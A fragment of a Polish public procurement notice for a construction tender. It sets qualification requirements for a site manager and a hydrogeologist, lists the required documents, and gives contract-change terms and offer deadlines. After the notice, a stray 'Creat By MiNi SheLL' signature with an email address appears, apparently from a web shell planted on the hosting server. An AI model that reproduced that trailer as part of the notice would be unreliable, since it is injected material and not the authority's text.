budowlanych i dokumentów potwierdzających, roboty zostały wykonane należycie i zgodnie z zasadami sztuki budowlanej oraz prawidłowo ukończone,<br/><br/> b) Wykonawca musi wykazać, że dysponuje lub będzie dysponować w okresie przewidzianym <br/> na realizację zamówienia osobami legitymującymi się kwalifikacjami zawodowymi oraz <br/> doświadczeniem odpowiednim do objęcia funkcji, jaki zostaną im powierzone.<br/> Wykonawca przedstawi w ofercie kandydata na stanowisko: <br/><br/> - Kierownik budowy w zakresie instalacji i sieci sanitarnych – 1 osoba<br/>Wskazana osoba winna posiadać uprawnienia budowlane do kierowania robotami budowlanymi w w/w specjalnościach oraz posiadająca, co najmniej 8 letnie doświadczenie zawodowe.<br/><br/>Warunek w rozumieniu Zamawiającego spełni Wykonawca, który będzie dysponował, co najmniej jedną osobą uprawnioną zgodnie z wymogami ustawy Prawo budowlane z 07.07.1994r. (tekst jednolity Dz. U. z 2019 r. poz. 1186 z późn. zm.). do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. kierownika budowy posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności sanitarnej<br/><br/>	- Kierownik prac geologicznych sprawujący dozór hydrogeologiczny w zakresie geologa- <br/> hydrogeologa – 1 osoba<br/><br/>Warunek w rozumieniu Zamawiającego spełni Wykonawca, który będzie dysponował co najmniej jedną osobą uprawnioną zgodnie z poniższym wymogiem:<br/><br/>Funkcję dozoru geologicznego może sprawować w trakcie wiercenia hydrogeologicznego uprawniony hydrogeolog lub geolog posiadający odpowiednie kwalifikacje zawodowe. Art. 50 – 52 ustawy z dnia 9 czerwca 2011 r. - Prawo geologiczne i górnicze (Dz.U. 2011 nr 163 poz. 981)<br/><br/><br/>Wskazana osoba winna posiadać, co najmniej 8 letnie doświadczenie zawodowe.<br/><br/><br/> c) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w <br/> szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie <br/> robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, <br/> uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia <br/> publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o <br/> podstawie do dysponowania tymi osobami.<br/><br/>W celu informacji o osobach, które zostaną skierowane do realizacji zamówienia a w czasie jej realizacji do możliwości skontrolowania przez zamawiającego czy wymienione osoby z wykazu rzeczywiście wykonują roboty przy realizacji inwestycji.<br/>Wykonawca może przedłożyć w/w wykaz najpóźniej w dniu podpisania umowy wraz z oświadczeniem o wyrażeniu zgody na przetwarzanie danych osobowych (załącznik nr 9)<br/><br/>Zamawiający określając wymogi dla potencjału kadrowego w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (tekst jednolity Dz. U. z 2019 r. poz. 1186 z późn. zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2016 r., nr 63, poz. 65).<br/><br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunki. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu <br/> Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki <br/> terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie <br/> zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. <br/> 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, <br/> a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne <br/> wraz z zaświadczeniem albo innym dokumentem należy złożyć dokumenty potwierdzające, że <br/> przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na <br/> ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące <br/> porozumienie w sprawie spłat tych należności<br/><br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o <br/> Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie <br/> wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do <br/> rejestru lub ewidencji <br/><br/> 3) oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy <br/> kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i <br/> konsumentów tekst jednolity (Dz. U. z 2021 r. poz. 275.), o której mowa w art. 108 ust. 1 pkt. 5 <br/> ustawy Pzp, przekazuje Zamawiającemu w formie oświadczenia stanowiącego załącznik nr 8 <br/> do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed <br/> upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym <br/> okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na <br/> rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te <br/> roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty <br/> zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy <br/> czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez <br/> podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej <br/> przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych <br/> dokumentów - inne dokumenty,(załącznik nr 7)<br/><br/>2) oświadczenie na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry <br/> kierowniczej wykonawcy,(załącznik nr 8)<br/><br/>3) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w <br/> szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie <br/> robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, <br/> doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także <br/> zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania <br/> tymi osobami (załącznik nr 9).<br/><br/>W celu informacji o osobach które zostaną skierowane do realizacji zamówienia a w czasie jej realizacji do możliwości skontrolowania przez zamawiającego czy wymienione osoby z wykazu rzeczywiście wykonują roboty przy realizacji inwestycji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy (Załącznik nr 1) - wypełniony i podpisany przez wykonawcę<br/><br/>2) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz o nie <br/> podleganiu wykluczeniu - wypełnione i podpisane przez wykonawcę. Oświadczenie to stanowi <br/> dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w <br/> postępowaniu odpowiednio na dzień składania ofert, stanowi dowód tymczasowo zastępujący <br/> wymagane przez zamawiającego podmiotowe środki dowodowe.<br/><br/>3) Wzory umów stanowią element informacyjny i nie podlegają ocenie zał. 3 (nieobowiązkowy do <br/> załączenia do oferty) <br/><br/>5) Wykaz osób do kontaktów z zamawiającym (stanowi element pomocniczy oraz informacyjny i <br/> nie podlega on ocenie)<br/><br/>6) Oferowane warunki gwarancji <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Szczegółowe informacje dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zostały przedstawione w SWZ rozdział VII pkt. 5 i 8 oraz V i XI pkt. 3, która została zamieszczona jako załącznik do ogłoszenia naszej stronie: www.bip.regimin.pl <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> a) wystąpienia istotnych wad dokumentacji projektowej skutkujących koniecznością dokonania <br/> poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację <br/> określonego rodzaju robót mających wpływ na zmianę terminu realizacji – zmianie ulegnie <br/> odpowiednio termin realizacji zamówienia.<br/> b) zaistnienia okoliczności po stronie zamawiającego, w szczególności spowodowanych<br/> sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi bądź <br/> okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy – <br/> zmianie mogą ulec termin realizacji umowy oraz terminy wynikające z harmonogramu albo<br/> c) gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność <br/> prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, <br/> skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją <br/> warunków zamówienia – zamawiający dopuszcza możliwość zmiany umowy, w <br/> szczególności terminu realizacji zamówienia i jego zakresu.<br/>	d) jeżeli w trakcie robót ziemnych nastąpi kolizja z zabytkami archeologicznymi, gdzie trzeba <br/> będzie wstrzymać roboty budowlane aby móc przeprowadzić stosowne badania archeologiczne <br/> zmianie ulegnie odpowiednio termin realizacji zamówienia<br/>e) wystąpienia opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których <br/> właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy <br/> okres, przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz <br/> nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność,<br/>f) gdy niemożność dotrzymania pierwotnego terminu realizacji przedmiotu umowy, stanowią <br/> konsekwencję działania sił wyższych niezależnych od wykonawcy, niestanowiących jego i <br/> podwykonawców problemów organizacyjnych, których nie można było przewidzieć, któremu <br/> nie mogły zapobiec ani któremu nie mogły przeciwdziałać, a które uniemożliwiają wykonawcy<br/> wykonanie w części lub w całości jego zobowiązania wynikającego z niniejszej umowy. Strony <br/> uzgadniają, że pod pojęciem siły wyższej rozumieją zwłaszcza: wojnę, zamach terrorystyczny, <br/> katastrofy naturalne, pożar, deszcz nawalny, trzęsienie ziemi, burzę, huragan, strajk. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-08 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w instrukcji korzystania z mini portal zamieszczonym na stronie: https://miniportal.uzp.gov.pl/Instrukcje oraz Regulaminie ePUAP dostępnym na stronie: https://epuap.gov.pl/wps/portal/strefaklienta/regulamin. Zaszyfrowaną ofertę przeba przesłać na Adres skrzynki ePUAP:/1402082/skrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-08 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com